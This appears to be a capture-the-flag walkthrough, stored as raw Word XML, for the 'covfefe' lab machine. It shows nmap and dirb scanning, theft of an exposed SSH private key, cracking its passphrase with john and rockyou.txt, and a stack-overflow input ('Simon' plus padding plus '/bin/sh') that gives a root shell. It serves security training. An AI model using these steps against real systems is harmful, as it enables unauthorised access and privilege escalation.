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D0" w:rsidRDefault="002C372C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="736CEBDB" wp14:editId="7AF78168">
            <wp:extent cx="5943600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4C" w:rsidRDefault="0072484C" w:rsidP="0072484C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2C372C" w:rsidRDefault="0072484C" w:rsidP="0072484C">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.131</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072484C" w:rsidRDefault="00CD21D6" w:rsidP="0072484C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61514AEA" wp14:editId="3DFC8D84">
            <wp:extent cx="5181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D6" w:rsidRDefault="00DA52FC" w:rsidP="0072484C">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.131:31337/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DA52FC" w:rsidRDefault="004C5E70" w:rsidP="0072484C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D3748A6" wp14:editId="2674DCF2">
            <wp:extent cx="5943600" cy="139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85" w:rsidRDefault="009D4E85" w:rsidP="009D4E85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4C5E70" w:rsidRDefault="009D4E85" w:rsidP="009D4E85">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.131:31337/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D4E85" w:rsidRDefault="006F7FF9" w:rsidP="009D4E85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5891F184" wp14:editId="7A7ECC49">
            <wp:extent cx="522922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F9" w:rsidRDefault="006F7FF9" w:rsidP="009D4E85"/>
    <w:p w:rsidR="00FA10D1" w:rsidRDefault="00960F08" w:rsidP="009D4E85">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.131:31337/robots.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00960F08" w:rsidRDefault="00260AE6" w:rsidP="009D4E85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC30A34" wp14:editId="7248991F">
            <wp:extent cx="558165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E6" w:rsidRDefault="001169DF" w:rsidP="009D4E85">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.131:31337/taxes/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001169DF" w:rsidRDefault="00CB6074" w:rsidP="009D4E85">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C4210ED" wp14:editId="04F944AD">
            <wp:extent cx="549592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47" w:rsidRDefault="00686F47" w:rsidP="00686F47">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> try </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00686F47" w:rsidRDefault="00686F47" w:rsidP="00686F47"/>
    <w:p w:rsidR="00CB6074" w:rsidRDefault="00686F47" w:rsidP="00686F47">
      <w:r>
        <w:t xml:space="preserve">Now our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan showed us a few directories. Inside the /.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory we find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> keys and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00686F47" w:rsidRDefault="00760114" w:rsidP="00686F47">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.131:31337/.ssh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00760114" w:rsidRDefault="00760114" w:rsidP="00686F47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E4D2E2" wp14:editId="317069EF">
            <wp:extent cx="48768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2F" w:rsidRDefault="00052B2F" w:rsidP="00052B2F">
      <w:r>
        <w:t xml:space="preserve">We download the private key and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in our system for further enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052B2F" w:rsidRDefault="00052B2F" w:rsidP="00052B2F"/>
    <w:p w:rsidR="00760114" w:rsidRDefault="00052B2F" w:rsidP="00052B2F">
      <w:r>
        <w:t>Now we open authorized keys to check the username for the private key. We find it to be Simon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052B2F" w:rsidRDefault="0040342A" w:rsidP="00052B2F">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.131:31337/.ssh/id_rsa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0040342A" w:rsidRDefault="0040342A" w:rsidP="00052B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0279F3DA" wp14:editId="5ACB697B">
            <wp:extent cx="5943600" cy="2902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E1" w:rsidRDefault="00F674E1" w:rsidP="00F674E1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40342A" w:rsidRDefault="00F674E1" w:rsidP="00F674E1">
      <w:r>
        <w:t xml:space="preserve">└─#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id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F674E1" w:rsidRDefault="000003A8" w:rsidP="00F674E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252CE996" wp14:editId="58FD7F11">
            <wp:extent cx="31337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A8" w:rsidRDefault="003B5CBC" w:rsidP="00F674E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AF8CF2E" wp14:editId="3DAB7964">
            <wp:extent cx="322897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BC" w:rsidRDefault="003B5CBC" w:rsidP="00F674E1">
      <w:r w:rsidRPr="003B5CBC">
        <w:t xml:space="preserve">When we try to enter it ask for passphrase of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B5CBC">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B5CBC">
        <w:t xml:space="preserve"> key. So we use john the ripper to crack the password we use rockyou.txt to as our dictionary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964AB2" w:rsidRDefault="00964AB2" w:rsidP="00964AB2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3B5CBC" w:rsidRDefault="00964AB2" w:rsidP="00964AB2">
      <w:r>
        <w:t xml:space="preserve">└─# python /usr/share/john/ssh2john.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsacrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F2612A" w:rsidRDefault="00F2612A" w:rsidP="00964AB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E472008" wp14:editId="103B1CD2">
            <wp:extent cx="449580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9D" w:rsidRDefault="002F039D" w:rsidP="002F039D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964AB2" w:rsidRDefault="002F039D" w:rsidP="002F039D">
      <w:r>
        <w:t xml:space="preserve">└─# john -w=rockyou.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsacrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002F039D" w:rsidRDefault="00FF155C" w:rsidP="002F039D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363791F3" wp14:editId="182C77E6">
            <wp:extent cx="5943600" cy="1882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66" w:rsidRDefault="005F05C0" w:rsidP="002F039D">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F05C0">
        <w:t>output :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F05C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F05C0">
        <w:t>starwars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00972888" w:rsidRDefault="00972888" w:rsidP="00972888">
      <w:r>
        <w:t>┌─</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>─(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>💀</w:t>
      </w:r>
      <w:r>
        <w:t>kali)-[/home/kali/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F05C0" w:rsidRDefault="00972888" w:rsidP="00972888">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r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id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="009C330C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>simon@192.168.21.131</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00972888" w:rsidRDefault="00972888" w:rsidP="00972888">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F05C0">
        <w:t>starwars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00972888" w:rsidRDefault="00972888" w:rsidP="00972888">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D6FAC1" wp14:editId="6EDA2F2E">
            <wp:extent cx="5838825" cy="1981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88" w:rsidRDefault="0059476F" w:rsidP="00972888">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059476F">
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059476F">
        <w:t>:~$ find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0059476F" w:rsidRDefault="005778A2" w:rsidP="00972888">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="450FC9BC" wp14:editId="45BC716D">
            <wp:extent cx="385762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B1" w:rsidRDefault="002B7EB1" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/$ cd root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005778A2" w:rsidRDefault="002B7EB1" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/root$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002B7EB1" w:rsidRDefault="003F3E91" w:rsidP="002B7EB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F565B8B" wp14:editId="55FE9FA8">
            <wp:extent cx="4733925" cy="990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91" w:rsidRDefault="005C36D0" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C36D0">
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C36D0">
        <w:t>:/root$ cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C36D0" w:rsidRDefault="005C36D0" w:rsidP="002B7EB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="320B9CE1" wp14:editId="25BAA9FE">
            <wp:extent cx="26098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D0" w:rsidRDefault="00801B2E" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801B2E">
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801B2E">
        <w:t xml:space="preserve">:/root$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801B2E">
        <w:t>read_message.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00801B2E" w:rsidRDefault="001C224A" w:rsidP="002B7EB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60558ED2" wp14:editId="652B33EC">
            <wp:extent cx="5943600" cy="2649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F8" w:rsidRDefault="00A74DA6" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74DA6">
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A74DA6">
        <w:t xml:space="preserve">:/root$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74DA6">
        <w:t>read_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A74DA6" w:rsidRDefault="00177026" w:rsidP="002B7EB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78943929" wp14:editId="062F0D25">
            <wp:extent cx="5943600" cy="1633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26" w:rsidRDefault="002013D9" w:rsidP="002B7EB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>In above screenshot reading through the source code we find that, when we enter a string it reads the first 5 characters of the string as Simon, if it matches then it runs /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. But the input allocation for this is 20 bytes. So, we have to overflow the stack entering more than 20 bytes of data. We use the first 5 char to be ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Simon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’ followed by 15 ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’ and then ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’ at the 21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> byte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002013D9" w:rsidRDefault="009D704D" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D704D">
        <w:lastRenderedPageBreak/>
        <w:t>simon@covfefe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D704D">
        <w:t xml:space="preserve">:/root$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D704D">
        <w:t>read_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D704D" w:rsidRDefault="009D704D" w:rsidP="002B7EB1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D704D">
        <w:t>SimonAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D704D">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D704D">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D704D" w:rsidRDefault="009D704D" w:rsidP="002B7EB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F13DFFA" wp14:editId="58DEB27E">
            <wp:extent cx="4695825" cy="1752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4D" w:rsidRDefault="009D704D" w:rsidP="002B7EB1"/>
    <w:p w:rsidR="00712C68" w:rsidRDefault="00712C68" w:rsidP="002B7EB1">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0071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82"/>
    <w:rsid w:val="000003A8"/>
    <w:rsid w:val="00050882"/>
    <w:rsid w:val="00052B2F"/>
    <w:rsid w:val="001169DF"/>
    <w:rsid w:val="00177026"/>
    <w:rsid w:val="001C224A"/>
    <w:rsid w:val="002013D9"/>
    <w:rsid w:val="00260AE6"/>
    <w:rsid w:val="002B7EB1"/>
    <w:rsid w:val="002C372C"/>
    <w:rsid w:val="002F039D"/>
    <w:rsid w:val="003B5CBC"/>
    <w:rsid w:val="003F3E91"/>
    <w:rsid w:val="0040342A"/>
    <w:rsid w:val="004C5E70"/>
    <w:rsid w:val="005778A2"/>
    <w:rsid w:val="0059476F"/>
    <w:rsid w:val="005B630C"/>
    <w:rsid w:val="005C36D0"/>
    <w:rsid w:val="005F05C0"/>
    <w:rsid w:val="00686F47"/>
    <w:rsid w:val="006F7FF9"/>
    <w:rsid w:val="00712C68"/>
    <w:rsid w:val="0072484C"/>
    <w:rsid w:val="00730959"/>
    <w:rsid w:val="00760114"/>
    <w:rsid w:val="00801B2E"/>
    <w:rsid w:val="00960F08"/>
    <w:rsid w:val="00964AB2"/>
    <w:rsid w:val="00972888"/>
    <w:rsid w:val="009D4E85"/>
    <w:rsid w:val="009D704D"/>
    <w:rsid w:val="00A74DA6"/>
    <w:rsid w:val="00C40DD0"/>
    <w:rsid w:val="00CA58F8"/>
    <w:rsid w:val="00CB6074"/>
    <w:rsid w:val="00CC5266"/>
    <w:rsid w:val="00CD21D6"/>
    <w:rsid w:val="00DA52FC"/>
    <w:rsid w:val="00F2612A"/>
    <w:rsid w:val="00F674E1"/>
    <w:rsid w:val="00FA10D1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8114"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4FC8EF85-4CE7-4167-ADBC-19F6C617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2F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01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1.131:31337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://192.168.21.131:31337/taxes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://192.168.21.131:31337/.ssh/id_rsa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://192.168.21.131:31337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192.168.21.131:31337/robots.txt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192.168.21.131:31337/.ssh" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:simon@192.168.21.131" TargetMode="Externa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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>82</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-24T18:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-24T19:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>